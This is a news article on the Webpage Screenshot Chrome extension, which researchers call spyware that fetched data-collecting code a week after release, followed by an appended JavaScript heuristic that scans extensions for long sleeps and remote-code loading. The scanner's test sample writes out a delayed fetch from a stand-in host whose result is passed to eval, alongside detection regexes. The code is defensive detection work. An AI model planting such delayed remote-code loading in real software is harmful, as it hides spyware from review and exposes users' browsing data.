Webpage Screenshot, an add-on screen-capturing tool for Google Chrome, managed to bypass Google Inc.'s security controls and secretly collected users' browsing details without their knowledge, according to researchers, leading to new questions about the security of third-party Chrome extensions.
Researchers at Heimdal Security in Denmark published a report on Webpage Screenshot this week and went so far as to call the popular extension "spyware." Yet when Webpage Screenshot, which has 1.2 million users, was released for use, it had not demonstrated any malicious behavior. According to Heimdal Security, its spyware capabilities were initiated a week later via download of additional code from the Web, which allowed the extension to collect data such as users' IP addresses, URLs visited, files and data loaded from URLs, search queries entered and even personal contact information.
"On the surface it all looks good: When you run it in the sandbox environment, it doesn't look like it does anything malicious," said Peter Kruse, founder of CSIS Security Group, which spun off Heimdal Security last year. "A time wait is usually a bad sign, because who would put a function like time wait into good code? You can use it as an indicator of a potential malicious thing."
The spyware functions of Webpage Screenshot were actually published separately on StopMalvertising a year ago. According to Kruse, the discovery was simply not picked up by media and the extension continued to collect and sell user browser data.
Swedish newspaper Dagens Nyheter (DN) reported on the popular extension this week when the malicious behavior was discovered by Sentor MSS, a security services firm based in Stockholm. The Swedish media spread this news to the Danish media, and it eventually landed in the Heimdal Security lab.
"We issued a warning as well," Kruse said, "because there was quite many [40,000] Danish users using this extension."
The warnings eventually led Google to remove the add-on from its Google Chrome Web Store earlier this week.
"It is against the Chrome Web Store Content Policies to distribute malware," a Google spokesperson wrote in an email to SearchSecurity. "When we detect items containing malware or learn of them through reports, we remove them from the Chrome Web Store and from active Chrome instances."
Primary purpose: Screenshots or data exfiltration?
During its research into Webpage Screenshot, Heimdal Security followed the registrant information on the extension's homepage to the developer: Aminadav Glickshein, a resident of Israel. According to Heimdal, Glickshein used a server in New York to redirect data transmitted by the app that included sensitive information.
"The primary purpose of this extension is not to provide a screenshot function," Kruse said. "That's actually kind of lame in the first place, because you have built-in screenshot functions."
Last year, Chrome instituted its Single Purpose Policy, requiring extensions to serve only a single purpose. Chrome extensions undergo testing for snooping and unwanted transmission of user browsing data -- the problems that led to this policy being instituted.
"It's literally just a camouflage tool that has grown very large in popularity," Kruse said. "The real purpose [of the extension] was to extract a lot of traffic, a lot of data, and a lot of user behavior."
But Glickshein denies this. "Private data [was] never sent to any server," Glickshein said in an email to SearchSecurity. "Google removed [the extension] because of reporters."
Yet the DN newspaper reported it was in contact with "the owner" of Webpage Screenshot and that he told the newspaper that the aim of the extension was to "produce statistics on surfing behavior," which he called commercially valuable.
Chrome extension security
Despite the controversy surrounding Webpage Screenshot and the long-standing security issues with add-ons for all Web browsers, Kruse acknowledged Google is doing the best it can with Chrome extension security considering the many submissions that it receives. To some degree, he said, the end users need to trust the vendor whose application they are using. Asking Google to do a complete manual code review for every add-on, he noted, would be unfeasible.
"Obviously when you have to validate a lot of applications, a lot of extensions, in the day -- you need to automate that process," Kruse said. "And [if] you don't take into account that there are things that might sleep for a while or might include updating things from an external side, then there's bound to be a security risk."
But Kruse said Google could do more in the realm of vendor verification. He suggested implementing a Netflix-style star-based ratings system to gauge trust, with users who have been submitting quality code for a while earning more trust stars. He also recommended checking apps for sleep functions within their code, for which "even being creative" he could not come up with a legitimate use.
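Kruse's suggestion of checking extension code for sleep functions can be turned into a simple static heuristic: flag long literal timer delays, and treat them as worth manual review when the same source also loads or evaluates remote script, the pattern the article describes. The following JavaScript is an added example, not code from the article, the extension, Heimdal or Google; the one-day threshold, the regular expressions and the constructed sample sources are assumptions.

```javascript
// Added example: heuristic scan of extension JavaScript for a "time wait"
// (long timer or alarm) combined with remote-code loading. Assumptions:
// the one-day threshold, the regexes, and the constructed sample sources.
const LONG_DELAY_MS = 24 * 60 * 60 * 1000; // assumption: >= 1 day is "sleeping"

// setTimeout/setInterval whose delay is a numeric literal or a simple
// product/sum of literals, e.g. 7 * 24 * 60 * 60 * 1000. Computed delays
// are not recognised; this is a review aid, not a verdict.
const TIMER_RE = /\bset(?:Timeout|Interval)\s*\([^,]*,\s*([\d\s*+]+)\s*[,)]/g;
// chrome.alarms.create(name, { periodInMinutes: N }) / { delayInMinutes: N }
const ALARM_RE = /\b(?:periodInMinutes|delayInMinutes)\s*:\s*([\d\s*+]+)/g;
// Remote-code indicators: eval/Function, or a script src set to an http(s) URL.
const REMOTE_CODE_RE = /\beval\s*\(|new\s+Function\s*\(|\.src\s*=\s*['"`]https?:\/\//;

// Evaluates "a * b + c" style constants without running any code.
function evalConstExpr(expr) {
  if (!/^[\d\s*+]+$/.test(expr)) return NaN;
  return expr.split('+').reduce((sum, term) =>
    sum + term.split('*').reduce((p, f) => p * Number(f.trim()), 1), 0);
}

function scanExtensionSource(source) {
  const findings = [];
  for (const m of source.matchAll(TIMER_RE)) {
    const ms = evalConstExpr(m[1]);
    if (ms >= LONG_DELAY_MS) findings.push({ kind: 'long-timer', ms });
  }
  for (const m of source.matchAll(ALARM_RE)) {
    const ms = evalConstExpr(m[1]) * 60 * 1000;
    if (ms >= LONG_DELAY_MS) findings.push({ kind: 'long-alarm', ms });
  }
  const loadsRemoteCode = REMOTE_CODE_RE.test(source);
  const sleeping = findings.length > 0;
  // Sleep plus remote code is the combination that merits a manual review.
  const verdict = sleeping && loadsRemoteCode ? 'review'
    : sleeping || loadsRemoteCode ? 'note' : 'clean';
  return { findings, loadsRemoteCode, verdict };
}

// Constructed samples (not the real extension's code).
const BENIGN = `chrome.action.onClicked.addListener(() => captureVisibleTab());
setTimeout(hideToolbar, 2000);`;
const SUSPECT = `setTimeout(() => {
  fetch('https://example.invalid/update.js').then(r => r.text()).then(t => eval(t));
}, 7 * 24 * 60 * 60 * 1000);`;

console.log(scanExtensionSource(BENIGN).verdict, scanExtensionSource(SUSPECT).verdict);
```

The scan only sees literal delays and obvious loaders, so a clean result is no guarantee; the point is to surface candidates for the manual review Kruse says cannot be done for every submission.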